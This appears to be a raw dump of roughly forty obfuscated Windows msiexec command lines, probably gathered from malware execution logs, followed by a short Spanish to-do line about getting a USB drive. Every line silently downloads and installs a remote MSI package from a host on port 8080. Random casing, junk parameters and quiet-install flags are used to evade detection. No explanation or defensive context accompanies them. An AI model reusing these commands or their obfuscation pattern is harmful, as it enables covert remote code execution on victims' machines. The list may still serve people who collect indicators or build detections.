MSIEXEC
"MsiEXEc 	/q	fs=ii	GEJDRGE=PuWlqFr /I""hTtp://0W.pM:8080/B7AQFEMdZdv6oc/MMlPFeDkrXQlR/DMuqO/5CG0434YQT?TSM004"" DcQ=Abp	"

"MSIExEc 	-q	/I""http://Ri7.BIZ:8080/kGGeATVlddU/CZC1427NX1=JJS013""	"
"MSiEXec  /fV ""hTtP://9R.re:8080/AUy3DGdi6WPXglxvbTZ/aixc/o/F/5CG0434YY6?RMJ004"" hx=kim -qN	IFYU=KtCZ CWiUey=VDLN "
"MSiexec  vStjtN=mWfsjLPD	BQpea=OKJJE zcaSyA=Oh	-quieT /PaCkaGe	""HTTp://QjI6.com:8080/AyATMcI/g/ain/37OHuYw/n/5CG02336L2?LSP007"" "
"MsIexec  snaxXzJH=Pu	VsPhZG=rBhJ /q	ctCEEW=xTzJYEF -fv	""htTp://6Wr9.COm:8080/yNAsu7Hxx5jCJCN0D/o7eP9oLqT/5CG043B1TM?jra040"" pwwPWe=lgz	"
"msIexEc 	XGNm=sSlZbHXyQ	qvuCTB=luEQub iHCQ=mClAbZ /I""hTtp://4s.PM:8080/yDBqQr/rRfqMuql59mbqINWmcfxr1cErb/5CG1016HTP?zaragozaml"" bHyNwG=ZyDKPO	-qn	FDRwxoq=qSbKFg "
msieXEc /q-IHttP://Nzm.One:8080/usDQHu8psZA/CZC1427R9F=MSO006
"MSiExec  HiwKI=ioKkU fRszPMree=TDvThtTlX enTrH=abIFLoda /q	ngEapFQ=ZQ fMCLegItc=VFYIOlLcO	/fV	""HTtP://jrX.TW:8080/A/lA/OMc8r/PzWE2/oevcTTD0w8Wiru/CZC95199P3?AMU003""	"
"mSIEXec  iTIlh=vCYfnNCmw yFCrGQ=Msro	ajzw=tI /qN	TCg=zAhCXlCY beaJVzF=smeV /fV	""HtTp://Q0.pm:8080/BAA1Ka/7vMMTgMKUcw7K/S/GfLfdig/5CG0234YV1=JFC024"" WNUcX=LE	KAN=uinbp	"
"MSiExec  HiwKI=ioKkU fRszPMree=TDvThtTlX enTrH=abIFLoda /q	ngEapFQ=ZQ fMCLegItc=VFYIOlLcO	/fV	""HTtP://jrX.TW:8080/A/lA/OMc8r/PzWE2/oevcTTD0w8Wiru/5CG0234ZS4?BAG002""	"
"MsIEXec  LFlbdii=CQs	UF=KlGbd	/q nMuCnXQhd=qlDeSu XwMrQ=cW	swwlfskmY=GzX	/paCkAGe	""HTtp://5qE8.COm:8080/yjBiaBP/YMo/hWpvpEq/h1c7ZlluUu/alrYKc/5CG0024SZQ?AFI002""	Dn=OwTcJosmH uXHAF=tpbNez Rek=AxUUvt	"
"mSieXeC 	yKqiwWx=hI cyKflVet=UB	-quIET xzIaqxYNY=MSeqt SGkymWNG=wZbEf	/Fv ""hTtP://n9fz.CoM:8080/uBAZIkCbq/jbh0xF954V9mQIXSJj795ves6/5CG0252TJK?ABS021""	"
"MSIExEc  TI=PGAVFj	jYRWGNiyK=SjFJIXY	-fV ""http://7yFB.com:8080/BnB/nQVOrABMyDkkrrM6qly79khz0a/CZC1449TYS?maa024"" WlMVrtr=KMT JHEzMFRqM=uwxb	-Q	Za=KFexEOS "
"msiEXEc 	IxUET=Etv lt=ENg /PaCkaGe ""hTtP://jrX.tw:8080/ymB59LHEVw7vmZVfRDJXTvja/8L2/m87RMD/CZC951BH1X=cultura""	dTsLq=grE	-quIEt PvRFvkv=PvHI	"
"MsiexeC  lN=XmHadET GPwt=BYWLSwR /fV	""htTP://2i.nU:8080/AWyRvj1vD8Zss7p18Ct0ZMfrbHW0iaeNw0F9wrf3/CZC8328C1M=ERS007"" /qn	nynqlMxvm=UarD "
"msiEXec 	YQRUlQuC=QUYE	FVdb=HZtYTmzqH efvr=KJ -FV ""hTtP://y0.wF:8080/ycBrc1IfZUo/o7TAXZ3HZNo5xqi6xKagbdq4gFX2/CZC1449TYS=maa024""	bQC=clvSRTtNE TEQz=CmoGlrr -Qn tEjvQmCkg=JexWPkFD hgbjvsU=RbdzYS Nr=wUSsHkao	"
"msIexEc 	wyY=KTDJv /q EFkieXAO=WeE	eQfVovAFi=zJ	Yl=jdakjOxgd -i	""HtTP://27o.nl:8080/ymA/tI4wBtbOamvr4c2TrevwC62nQrS3kmarqWgb9Xx/CZC1427P63?MPV026""	"
"MSiExec  HiwKI=ioKkU fRszPMree=TDvThtTlX enTrH=abIFLoda /q	ngEapFQ=ZQ fMCLegItc=VFYIOlLcO	/fV	""HTtP://jrX.TW:8080/A/lA/OMc8r/PzWE2/oevcTTD0w8Wiru/5CG0439G4R?AMU003""	"
"MSIEXEC 	-Qn	xQr=NJUpOI eZPuxI=eQGtp Si=iuh	/PAcKaGE ""HtTp://1U.wF:8080/AZA/nSHAPRmiayRkj7kKirKrm545B6TnmU5/CZC1449168?LDA004""	Mea=iiUurpNvI GSwkkkJ=VBZSvkmcr	"
"msIEXeC  /Q-I""HttP://4S3.ME:8080/SyySzw3kOcn/CZC95199W4?AMQ004""	"
msIEXeC  /Q-I"HttP://4S3.ME:8080/SyySzw3kOcn/CZC1427Q71?AMQ004"
"MSIEXeC  IkmClHW=aPHJ	buzip=iM acHW=DkyAKG /Fv	""hTTp://w0.Pm:8080/yWyVzxnJoiNk/r9LrTCMJWsgFg1N/CZC1449293?MCJ024""	/QUiET Sdo=QexeIMK ilvvhYj=UZHcGJxN IIZZWAEUH=bv "
"MsiExEc 	baktP=vCWp -FV ""HTtP://fGcZ.neT:8080/B4AmY/hKZxRFFBhGr/4Ij1aZbhqpcbS4/5CG043B38Z?MCB072"" HyQYoKri=auMDJKzsz CWwGnA=cbIUi /q GdQUpygS=hsZk "
msiexec.exe msIexec /Q-I http://kgLo.liNk:8080/GsOugZ21Gjm/5CG0434YJY
MsIeXEc heJQfrQoH=wKX Wu=LEIpGn /fv httP://5V0.nL:8080/yoAKIk/oOurB/FS/mt9f1J4do9yk/5CG0439YYY=MPC061 /Qn RLcnuok=DkjK
msiexec.exe mSIeXEC mOfU=DeWKzSp orjTleCBf=EyeNdf xya=iGyW -FV HttP://4S.pM:8080/AMAnupFEo5Ra8Zkgf21268ciMg//CZC4343FRD?Aula -q HIYopTuv=sAS
msiexec.exe mSIeXEC ttr=kLyZ bDWw=RYbyLurn lmzRS=tGIqb -fv Http://I0.wF:8080/yJyFHjaogyX/F5p7kkz/W/MM58/CZC951B1RH=mgg081 /QN GtcsOj=fwuw'
MsIexec hTZlFNiu=Chs LpWjoFUF=AhqAWzd xfJ=bmkDtrQ /Qn /PacKagE httP://Fnx.Wf:8080/BEA5v1I3/0/mr/qlPFSB3ARnh0eiaEstj/bMK/5CG0517V81=SEP001 QOaYYZzCT=gXnH gJuf=Ms
MsIeXEc heJQfrQoH=wKX Wu=LEIpGn /fv httP://5V0.nL:8080/yoAKIk/oOurB/FS/mt9f1J4do9yk/5CG0439YYY=MPC061 /Qn RLcnuok=DkjK
MsiexEC WLv=pKfmUAwRV -q MwRkZNZMz=oIxGwlUTi FKESsx=cHlG ikPmQK=OzkSkBC -FV hTtP://8t.Wf:8080/BrBZa4/vHL/VZbxqwCOr9YKhmlbDYN22oQw//CZC951BH1X=cultura Swt=TLUZ
 MsIExec -FV HTtP://6t.NZ:8080/BOyipTK3zxSpFHYCDvC7hSJDFFlptd4v3IfW/dcg/CZC1449TDL?MCL046 joEbcTwx=BsNOeZmHA jJWr=PEuDpN -quIeT uCD=RRhaYOSXs xWuIWMQ=wWlHVwrp
 MsIExec -FV HTtP://6t.NZ:8080/BOyipTK3zxSpFHYCDvC7hSJDFFlptd4v3IfW/dcg/CZC9519M47?MMR042 joEbcTwx=BsNOeZmHA jJWr=PEuDpN -quIeT uCD=RRhaYOSXs xWuIWMQ=wWlHVwrp'
msIeXeC pwnd=gZS AYLdWav=AkXT rHWR=CnsyJi -FV Http://ZXN.fYi:8080/B/TBqA/q4tbRhG24JN5Z/B2z/CZC144936M?aula06-00 PXQFTz=WScaWv uClPiEw=RdKPFBDE -QUIet cTKZpwIgb=vIeGoGi hUXiLSEQ=nf
 MsIexEC /q GOppYpK=EQcioC gVzfOMq=nSQh /Fv HTTp://li1IV.COm:8080/ycu/XfCBgkLvBBqjiN10oRGTBVmIVbJOGqV8Lr6H//5CG043B15H?MAP050 OfZNrFfX=vrhBX wlFGI=jfFuFt
 msIeXeC pwnd=gZS AYLdWav=AkXT rHWR=CnsyJi -FV Http://ZXN.fYi:8080/B/TBqA/q4tbRhG24JN5Z/B2z/CZC14492TQ?profe3 PXQFTz=WScaWv uClPiEw=RdKPFBDE -QUIet cTKZpwIgb=vIeGoGi hUXiLSEQ=nf
msiexec.exe mSieXeC wXphqbsv=jSfV kLft=PIywDMTX XB=oM -qN wSdU=sx CY=eS /PACkagE Http://9r.sK:8080/yGAFo7eKxZLoSqsRw/MBqt/EwXXhyNgkU5/CZC83288SF=lombanaee.ext SMPtgq=metCIq
MsiExeC DIkZcZEwf=xEylYPvt YAsECU=PVCD -FV HTTp://8t.PM:8080/yoAEq8dBBhv6K1z/Hjir/xNgrXYT7zP8Iqi//5CG0439RLY?MAM020 NYTgNGuO=xwaEboAX YvHaMw=KrB -QUiet NaZdWez=IC RwYrwQh=noVaKoSRo

PENDIENTE CONSEGUIR USB
